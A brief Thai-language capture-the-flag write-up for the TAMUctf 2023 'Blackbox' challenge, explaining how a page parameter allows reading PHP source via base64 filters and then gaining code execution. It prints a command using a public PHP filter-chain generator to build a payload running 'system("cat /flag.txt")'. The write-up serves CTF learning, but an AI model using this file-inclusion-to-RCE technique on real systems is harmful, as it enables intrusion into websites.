TAMUctf 2023- การเขียน Blackbox
May 01 2023
ความท้าทายนี้สร้างโดย Mr. Blade เราจะเห็นว่ามันโหลดหน้าเข้าสู่ระบบด้วยพารามิเตอร์ของหน้า
ความท้าทายนี้สร้างโดย Mr. Blade

เราจะเห็นว่ามันโหลดหน้าเข้าสู่ระบบด้วยพารามิเตอร์ของหน้า
มาแจกแจงไฟล์. ฉันลองใช้ผู้ดูแลระบบก่อนและใช้ตัวเข้ารหัส base64

เมื่อเราถอดรหัสนี้ เราจะได้เส้นทางสำหรับ flag.txt
<center>
<h1><?php include('/flag.txt'); ?></h1>
</center>
ฉันใช้https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py
เพื่อรับ RCE
python3 filter_chain.py — chain ‘<?php system(“cat /flag.txt”);?>’ | grep ‘^php*’ | xclip -selection clipboard

ขอบคุณที่อ่าน.
มีความสุขแฮ็ค!